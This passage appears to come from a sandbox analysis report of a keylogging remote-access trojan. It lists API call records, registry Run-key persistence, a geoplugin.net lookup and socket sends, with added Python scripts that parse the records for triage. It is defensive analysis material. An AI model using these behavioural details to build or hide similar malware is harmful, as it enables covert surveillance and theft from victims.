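    "1615->1620 1621 41a5a3-41a5a6 1620->1621 1622 41a57f-41a59f call 401f86 "
    "call 402f08 call 401eea 1620->1622 1623 41a5a8-41a5aa 1621->1623 "
    "1624 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1621->1624 "
    "1622->1621 1623->1620 1623->1624 1628 41a5be-41a5c8 1624->1628"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
BLOCK_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_cfg(text):
    """Return ({block_id: {"start", "end", "calls"}}, [(src, dst), ...]).

    calls is a list of [name, repeat_count]; internal targets get a sub_ prefix
    (this example's own convention), imported APIs keep their bare name.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok == "call":                       # internal call target (hex)
            blocks[current]["calls"].append(["sub_" + tokens[i + 1], 1])
            i += 2
        elif tok == "*":                          # repeat count of the previous call
            blocks[current]["calls"][-1][1] = int(tokens[i + 1])
            i += 2
        elif (BLOCK_ID_RE.match(tok) and i + 1 < len(tokens)
              and ADDR_RE.match(tokens[i + 1])):  # new block: id + address (range)
            current = int(tok)
            addr = ADDR_RE.match(tokens[i + 1])
            start = int(addr.group(1), 16)
            end = int(addr.group(2), 16) if addr.group(2) else start
            blocks[current] = {"start": start, "end": end, "calls": []}
            i += 2
        else:                                     # bare name: imported API call
            if current is None:
                raise ValueError("call before any block: " + tok)
            blocks[current]["calls"].append([tok, 1])
            i += 1
    return blocks, edges


def successors(edges):
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    return succ


def entry_and_exit_blocks(blocks, edges):
    """Blocks with no predecessor (function entry) and with no successor (returns)."""
    has_pred = {dst for _, dst in edges}
    has_succ = {src for src, _ in edges}
    return (sorted(b for b in blocks if b not in has_pred),
            sorted(b for b in blocks if b not in has_succ))


def blocks_in_loops(blocks, edges):
    """Blocks that can reach themselves again, i.e. that lie on a cycle."""
    succ = successors(edges)
    looping = set()
    for start in blocks:
        seen, stack = set(), list(succ[start])
        while stack:
            b = stack.pop()
            if b == start:
                looping.add(start)
                break
            if b not in seen:
                seen.add(b)
                stack.extend(succ[b])
    return looping


def api_calls(blocks, edges):
    """Imported API name -> (total call sites, called inside a loop?)."""
    looping = blocks_in_loops(blocks, edges)
    summary = {}
    for bid, blk in blocks.items():
        for name, count in blk["calls"]:
            if name.startswith("sub_"):
                continue
            total, in_loop = summary.get(name, (0, False))
            summary[name] = (total + count, in_loop or bid in looping)
    return summary


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    print("entry/exit blocks:", entry_and_exit_blocks(blocks, edges))
    for name, (count, in_loop) in sorted(api_calls(blocks, edges).items()):
        print(f"{name:20s} x{count}  {'in loop' if in_loop else 'straight-line'}")
```

On the sample the only API on a cycle is InternetReadFile (blocks 1620 -> 1621 -> 1623 -> 1620), which is the loop draining the geoplugin.net response in 0xFFFF-byte reads, while the two InternetCloseHandle calls in block 1624 run once on the way out. The same parser accepts single-address blocks such as the "1658 412722" block of the RegCreateKeyA function on this page.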

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 1866151309-2070987746
                                                                                                • Opcode ID: af6938fd0642fd6960adb4339b8e44af404292a25ca7c0158ca9239a1ea53c7d
                                                                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                • Opcode Fuzzy Hash: af6938fd0642fd6960adb4339b8e44af404292a25ca7c0158ca9239a1ea53c7d
                                                                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                                Control-flow Graph

Basic blocks (id: address range, calls made in the block -> successor blocks):
• 1657: 4126d2-4126e9, RegCreateKeyA -> 1658, 1659
• 1658: 412722 -> 1661
• 1659: 4126eb-412720, call 4022f8, call 401e8f, RegSetValueExA, RegCloseKey -> 1661
• 1661: 412724-412730, call 401eea -> (exit)
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: HgF$pth_unenc
                                                                                                • API String ID: 1818849710-3662775637
                                                                                                • Opcode ID: 765c5b57a6dff30667eef5ece221311e43a2419d6aa6c2777a289da3ea8508e9
                                                                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                • Opcode Fuzzy Hash: 765c5b57a6dff30667eef5ece221311e43a2419d6aa6c2777a289da3ea8508e9
                                                                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                APIs
                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitsend
                                                                                                • String ID: LAL
                                                                                                • API String ID: 3963590051-3302426157
                                                                                                • Opcode ID: f152f079d860f25f234b0e641467767b8f062a6183c919acee6354ec023c117f
                                                                                                • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                • Opcode Fuzzy Hash: f152f079d860f25f234b0e641467767b8f062a6183c919acee6354ec023c117f
                                                                                                • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started
                                                                                                • API String ID: 465354869-4114347211
                                                                                                • Opcode ID: 7d563e3858a09df2f4bd7d6711c02a31a8398f24dadcc71a9cfb334c9013e64b
                                                                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                • Opcode Fuzzy Hash: 7d563e3858a09df2f4bd7d6711c02a31a8398f24dadcc71a9cfb334c9013e64b
                                                                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: TUF
                                                                                                • API String ID: 1818849710-3431404234
                                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3123878439-4028850238
                                                                                                • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
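The APIs entries in these records share one line format, Name.Module(args), ref: address, optionally prefixed with "Part of subcall function X:", and the argument list is a stack snapshot: hex words, "?" for values the plugin could not resolve, and literal strings such as the geoplugin URL, the registry value name HgF or the build string 5.3.0 Pro. Because it is a snapshot, anything past the API's real parameter count is residue left by earlier calls, not an argument (RegSetValueExA takes six parameters, so "5.3.0 Pro" in position twelve is context, not the value written). The Python below is an added example, not code from the report or from the analysed sample: it parses such lines, separates genuine string arguments from stack residue using a small arity table, pulls out URLs and registry hives from the documented HKEY root constants, and groups the APIs into behaviour buckets. The sample lines are copied from the records on this page; the bucket names, the BEHAVIOURS table and the ARITY table are this example's own assumptions about what a triage script would want.

```python
import re

# Constructed sample: API lines copied from the function records on this page,
# including one "Part of subcall" line, one line without an argument list and
# one section header that must be ignored.
SAMPLE_LINES = [
    "• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E",
    "• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554",
    "• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D",
    "• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1",
    "• RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709",
    "  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C",
    "• UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5",
    "• wsprintfW.USER32 ref: 0040A905",
    "• send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD",
    "Strings",
]

API_LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX_WORD = re.compile(r"^[0-9A-Fa-f]{8}$")

# Predefined registry root handles (documented Win32 constants).
REG_ROOTS = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
             "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}

# Real parameter counts of the APIs in the sample; anything past the arity is
# stack residue. APIs missing here are treated as if every slot were an argument.
ARITY = {"InternetOpenW": 5, "InternetOpenUrlW": 6, "InternetReadFile": 4,
         "RegCreateKeyA": 3, "RegSetValueExA": 6, "GetCurrentProcess": 0,
         "UnhookWindowsHookEx": 1, "send": 4}

# Behaviour buckets used by this example (an assumption, not a Joe Sandbox category).
BEHAVIOURS = {
    "network": {"InternetOpenW", "InternetOpenUrlW", "InternetReadFile", "send", "recv", "connect"},
    "registry_write": {"RegCreateKeyA", "RegCreateKeyExA", "RegSetValueExA"},
    "registry_read": {"RegOpenKeyExA", "RegQueryValueExA"},
    "keyboard_hook": {"SetWindowsHookExA", "SetWindowsHookExW", "UnhookWindowsHookEx"},
    "file_write": {"CreateFileW", "WriteFile"},
}


def parse_api_line(line):
    """Parse one APIs bullet; return None for anything that is not an API line."""
    m = API_LINE_RE.search(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": [a.strip() for a in args.split(",")] if args is not None else [],
        "ref": int(m.group("ref"), 16),
        "subcall": m.group("sub"),   # address of the sub-function, if any
    }


def extract_indicators(calls):
    """URLs, registry hives and string literals, split by argument vs. stack residue."""
    urls, hives, string_args, stack_strings = set(), set(), set(), set()
    for c in calls:
        arity = ARITY.get(c["api"])
        for idx, a in enumerate(c["args"]):
            if a.startswith(("http://", "https://")):
                urls.add(a)
            elif c["api"].startswith("Reg") and a in REG_ROOTS:
                hives.add(REG_ROOTS[a])
            elif a and a != "?" and not HEX_WORD.match(a) and not a.startswith("Function_"):
                (string_args if arity is None or idx < arity else stack_strings).add(a)
    return {"urls": sorted(urls), "registry_hives": sorted(hives),
            "string_args": sorted(string_args), "stack_strings": sorted(stack_strings)}


def summarize_behaviour(calls):
    """Bucket label -> sorted list of the APIs seen in that bucket."""
    seen = {}
    for c in calls:
        for label, apis in BEHAVIOURS.items():
            if c["api"] in apis:
                seen.setdefault(label, set()).add(c["api"])
    return {label: sorted(apis) for label, apis in seen.items()}


if __name__ == "__main__":
    calls = [c for c in map(parse_api_line, SAMPLE_LINES) if c]
    print(extract_indicators(calls))
    print(summarize_behaviour(calls))
```

On the sample this yields the geoplugin URL, HKEY_CURRENT_USER as the only hive touched, HgF as the one string that is really an argument (the lpValueName of RegSetValueExA), and WinDir and 5.3.0 Pro as stack residue; the behaviour summary shows network, registry_write and keyboard_hook activity from these lines alone, which is the combination the signatures at the top of the report flag.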
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404797
                                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 004047A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: 0fe16b6651eafcc54e03b4dec98785a360e0800c2299c91ef6750890a33817fb
                                                                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                • Opcode Fuzzy Hash: 0fe16b6651eafcc54e03b4dec98785a360e0800c2299c91ef6750890a33817fb
                                                                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                                • String ID:
                                                                                                • API String ID: 188215759-0
                                                                                                • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                                • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3604237281-0
                                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
APIs
Strings
• API ID: CountEventTick
• String ID: >G
• API String ID: 180926312-1296849874
APIs
• RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
• RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 00412998
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
Strings
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
• API String ID: 3325800564-4028850238
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Strings
• API ID: CreateErrorLastMutex
• String ID: (CG
• API String ID: 1925916568-4210230975
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• RegCloseKey.KERNEL32(00000000), ref: 0041269D
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
• RegCloseKey.KERNEL32(?), ref: 00412500
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
• RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• GdiplusStartup.GDIPLUS(00473AF0,?,00000000,004747A8,?,00000000), ref: 00417909
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(0040466D,000000FF,00000000,?,?,00000000,?,0040466D,00000000,?,?), ref: 004047FD
  • Part of subcall function 004047EB: SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404808
  • Part of subcall function 004047EB: CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404811
Strings
• API ID: CloseEventGdiplusHandleObjectSingleStartupWaitsend
• String ID: >G
• API String ID: 3841810518-1296849874
APIs
Strings
• API ID: _wcslen
• String ID: xAG
• API String ID: 176396367-2759412365
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A924
Strings
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
Strings
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
APIs
• GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
Strings
• API ID: FromGdipImageLoadStream
• String ID: swA
• API String ID: 3292405956-3360919852
                                                                                                APIs
                                                                                                • GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DisposeGdipImage
                                                                                                • String ID: swA
                                                                                                • API String ID: 1024088383-3360919852
                                                                                                • Opcode ID: 53d02a7cdc31564afcf08cdd77fcdae3b4280dc9da9913a0847c3ab8625b2a6f
                                                                                                • Instruction ID: 212e07d5799bb9a24d17fec7de07d61041a30ae78413593dc916522769f6e6c6
                                                                                                • Opcode Fuzzy Hash: 53d02a7cdc31564afcf08cdd77fcdae3b4280dc9da9913a0847c3ab8625b2a6f
                                                                                                • Instruction Fuzzy Hash: DCA01130800202CF8F022F20AE080003EA0EB0230A320C0A8800888232E333C802CA8A
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044B9DF
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap$_free
                                                                                                • String ID:
                                                                                                • API String ID: 1482568997-0
                                                                                                • Opcode ID: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                • Opcode Fuzzy Hash: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                APIs
                                                                                                • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEventStartupsocket
                                                                                                • String ID:
                                                                                                • API String ID: 1953588214-0
                                                                                                • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3476068407-0
                                                                                                • Opcode ID: 30b622fd39dfe81e016544b816676d4fdb2bf9eeff9443c40b7b6911b9045d4b
                                                                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                • Opcode Fuzzy Hash: 30b622fd39dfe81e016544b816676d4fdb2bf9eeff9443c40b7b6911b9045d4b
                                                                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                APIs
